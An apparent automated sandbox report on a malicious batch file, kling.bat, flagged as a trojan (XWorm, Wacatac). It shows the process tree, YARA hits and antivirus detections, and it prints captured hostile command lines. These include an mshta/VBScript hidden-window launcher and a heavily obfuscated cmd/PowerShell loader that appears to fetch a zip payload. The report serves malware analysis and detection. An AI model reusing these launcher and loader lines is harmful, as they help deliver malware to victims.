Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 31, 2024, 6:01 p.m.	Oct. 31, 2024, 6:07 p.m.

Size	168.0KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
MD5	`7cdc721068ac95fac15070f34e863e9a`
SHA256	`0f61b70f1a01efd0c3ebfcdc1fc393970c8c925ed81dc90013c6add5f1cc7190`
CRC32	`0571D52A`
ssdeep	`3072:SUfoa09TUbVTgIRFJ1I4HGR38t/3X16mCAivXGSd1CUdr80L3UjNRxkL:xf5V1i8GR3mPMmCP/Ge1CUdo+EG`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "dwgenGeAk" C:\Users\test22\AppData\Local\Temp\kling.bat
2556
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\kling.bat
  2628
  - chcp.com chcp 65001
    2760
  - mshta.exe mshta vbscript:createobject("wscript.shell").run("""C:\Users\test22\AppData\Local\Temp\kling.bat"" ::",0)(window.close)
    2816
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\kling.bat" ::"
      2916
      - chcp.com chcp 65001
        3048

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (12 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 31, 2024, 6 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 31, 2024, 6 p.m.	buffer: nul console_handle: 0x00000007	1	1
WriteConsoleW Oct. 31, 2024, 6 p.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW Oct. 31, 2024, 6 p.m.	buffer: nul console_handle: 0x00000007	1	1
WriteConsoleW Oct. 31, 2024, 6 p.m.	buffer: cls console_handle: 0x00000007	1	1
WriteConsoleW Oct. 31, 2024, 6:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 31, 2024, 6:01 p.m.	buffer: nul console_handle: 0x00000007	1	1
WriteConsoleW Oct. 31, 2024, 6:01 p.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW Oct. 31, 2024, 6:01 p.m.	buffer: nul console_handle: 0x00000007	1	1
WriteConsoleW Oct. 31, 2024, 6:01 p.m.	buffer: cls console_handle: 0x00000007	1	1
WriteConsoleW Oct. 31, 2024, 6:01 p.m.	buffer: '1AXvVaI%B1%dTJwRrm%n%hR#EWL%s%LM' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000f	1	1
WriteConsoleW Oct. 31, 2024, 6:01 p.m.	buffer: 'C:\Windows\SysWOW64\Win~6' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000f	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 31, 2024, 6:01 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 31, 2024, 6:01 p.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1	0	0

Creates a suspicious process (2 events)

cmdline

C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.~-27, 1%j%Zycce]o%h%p(DWAUM%z%EQC#jzh%w%)N)Sk%n%mvTYm#O%y%x_Aoo%d%nuBYi%U1%Ogh,uQd%w%]eJHEe%t%YqfFh%y%yaaml%t%KpktE%h%]m)wV%t%Fqg_Y)%q%g?KP[v%TMP:~-4, 1%d%G]dZDFs%u%R$Rg#N%j%ydUsxFJ(RNJcGdS#ooZV%Y1%rUutqk_%q%frJxHf[%x%lT)qkY::~-20, 1kAPAtccPSWbOAJ%S1%ij$Mr%j%BE?QDlu%b%tl_Rqu$XT,dVb%T1%OrCIX%g%eUIwjZW%o%?meBq%j%S]sJ)r%h%ZHe[[T%y%Ir,ImH)WCiE%Y1%wj$$Z%d%J[[]fSF%u%TNbBNW%j%kaDCVi%S1%CQsslO%f%p(dspmn%r%J[E_y%j%AYNFsfX1%rBIyLC%d%#?jcZ?k%x%pknfkl%y%VrVnTwa%j%g]DDK]%r%HdJyoxjzDyTqa%S1%vutbop%j%zCv)$O%y%$eUFxX#QnOf%B1%_aea,%j%FHh$$_%g%uSE(s%H1%lxXur%q%)DtOhM%n%,qM)gY%j%HJwqPXa%s%PZGVlY%y%jOXCQ#?j$pKx(_se_j%tmp:~-15, 1%t%?SPy_%b%ZcIxV%s%?mRyV(%q%ddIsY(%lOcaLApPdAtA:~-4, 1%f%VSmIm%i%Rdgix%K1%zCokOMq%n%,HOVy%q%puXQNS%j%WcnY]tuSlol#]lhfc)w%m%ADZUb%y%kxY_Z%y%jayKm%u%e$TKXN%x%Bk?hhsSbCVRL#q?ZFjJmmAQ%h%b#_NLo%m%)xIDZ%w%n)FSH%t%__ExV$B%r%uQXmhPL%j%GeiU(%z%orJFDv%u%BATtww%i%pQGbD%f%w#QSML%y%)Poqc)%j%NY,Xh%x%$EeA,Rl$SAOq%h%XLcyxP%t%BSosDgA%r%qlsyrFxmMH?us%x%mj$HhK$%d%?otLSx%s%CKxwq[q%f%#L(dz(P%u%NbKQDS%y%_$CUXF%KDOT:~33,1%TEmp:~-8, 1%x%AriZxObaPIlE%e%NOgpsb%n%HmftM%u%DGTDmgCFCrpGJjQk)oeBpP%X1%Kj)rK(q%d%dGk,h%x%tEYjbTM%y%TlZQZRN%KDOT:~37,1%r%CSs]EgGOAyg_RD%N1%B?sMIw%T1%DIvyTjGGg$OV_y%U1%GZHqGz%f%TIteT%y%C_O?l%m%lXCTHZq]#DiTaKkJnWIMRmzB%L1%zKyZcl%j%GSAmtk%y%unMu#%Y1%PNs(ulc%j%hJxleU%r%iVk]v#%u%JjZlGq%U1%u?EIXz%f%O)BEd%y%MTYLbhL%m%$]Bcs$#eMTuIxtBQKCoIH_ZoPTFn%c%Q,CDy%K1%_z(By%X1%SreKci%T1%nUnayK%o%[vUpfUEl1Q.zip') "

cmdline

mshta vbscript:createobject("wscript.shell").run("""C:\Users\test22\AppData\Local\Temp\kling.bat"" ::",0)(window.close)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Oct. 31, 2024, 6:01 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\kling.bat parameters: :: filepath: C:\Users\test22\AppData\Local\Temp\kling.bat	1	1	0

File has been identified by 4 AntiVirus engines on VirusTotal as malicious (4 events)

ESET-NOD32	a variant of Generik.FQWMGAD
Kaspersky	HEUR:Trojan.BAT.Alien.gen
Gridinsoft	Malware.U.XWorm.tr
Microsoft	Trojan:Script/Wacatac.B!ml

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Oct. 31, 2024, 6:01 p.m.	status_code: 0x00000001 process_identifier: 812 process_handle: 0x00000094		0	0
NtTerminateProcess Oct. 31, 2024, 6:01 p.m.	status_code: 0x00000001 process_identifier: 812 process_handle: 0x00000094	1	0	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	C:\Users\test22\AppData\Local\Temp\kling.bat ::
cmdline	chcp 65001

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2628 resumed a thread in remote process 2816
NtResumeThread Oct. 31, 2024, 6:01 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2816	1	0	0

kling.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All